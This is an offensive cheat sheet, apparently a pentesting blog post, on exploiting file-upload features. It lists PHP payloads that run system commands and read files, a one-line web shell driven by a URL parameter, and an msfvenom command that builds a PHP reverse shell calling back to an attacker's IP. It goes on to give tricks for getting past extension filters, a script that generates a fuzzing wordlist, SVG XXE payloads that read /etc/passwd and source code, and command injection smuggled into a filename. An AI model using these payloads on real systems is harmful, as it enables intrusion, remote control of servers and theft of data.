File Upload Cheat sheet
PHP Payloads
Basic PHP payload that prints “hi” on the webpage:
1
<?php echo "hi"; ?>
Payload to execute a system command:
1
<?php system('cmd'); ?>
Payload to read a file from the system:
1
<?php echo file_get_contents('/file_location'); ?>
Web Shell
A simple web shell allowing command execution via the cmd URL parameter:
1
<?php system($_REQUEST['cmd']); ?>
This is command will you generate a php reverseshell:
1
msfvenom -p php/reverse_php LHOST=IP LPORT=PORT -f raw > shell.php
Adjust the
-pflag for shells in other programming languages as needed.
Here are some links to PHP reverse shells you might find useful: php-reverse-shell, phpbash, SecLists
Remember to replace
LHOSTandLPORTwith your IP and port values.
Bypassing Blacklist Filters
If the file extension you want to use is blacklisted, try experimenting with other extensions from this web extensions list. You might also bypass filters by changing the case of characters in the extension, such as using PHP or pHp.
You can use the echo command in your payloads to verify if the code execution is successful.
Bypassing Whitelist Filters
For whitelist filters, try double extensions, such as .jpg.php. In some cases, web servers may interpret double extensions in reverse, so .php.jpg might work as well.
This wordlist can assist with fuzzing.
Alternatively, you could add characters before or after the extension to manipulate the filename interpretation. Examples:
| Character | Example |
|---|---|
%0d0a | shell.php%0d0a.jpg |
%00 | shell.php%00.jpg |
%20 | shell.php%20.jpg |
%0a | shell.php%0a.jpg |
/ | shell.php/.jpg |
.\ | shell.php.\jpg |
: | shell.php:.jpg |
… | shell.php….jpg |
. | shell.php..jpg |
The null byte (%00), for example, tricks the server into interpreting shell.php%00.jpg as shell.php.
Note: This method does not work with PHP versions after 5.x.
This Python script will generate a wordlist to help you with fuzzing
1
2
3
4
5
6
7
8
9
10
chars = ['%20', '%0a', '%00', '%0d0a', '/', '.\\', '.', '…', ':']
extensions = ['.php']
with open('list.txt', 'w') as f:
for char in chars:
for ext in extensions:
f.write(f"shell{char}{ext}.jpg\n")
f.write(f"shell{ext}{char}.jpg\n")
f.write(f"shell.jpg{char}{ext}\n")
f.write(f"shell.jpg{ext}{char}\n")
Other Attacks
If only images are allowed, you may still be able to exploit vulnerabilities through file uploads. For example, by changing the content of an image file to the following payload, you could potentially exploit an XXE vulnerability to read the contents of /etc/passwd
1
2
3
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg>&xxe;</svg>
Alternatively, we could try reading the source of index.php with this payload:
1
2
3
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<svg>&xxe;</svg>
Another approach is to attempt SQL or command injection through the filename. For example, if the server moves uploaded images by executing a command to transfer them to another folder, we could exploit this process. example:
1
mv image /uploads
Naming the image img$(whoami).png could execute whoami on the server.
Thank you for reading! If there’s anything specific you’d like added, let me know.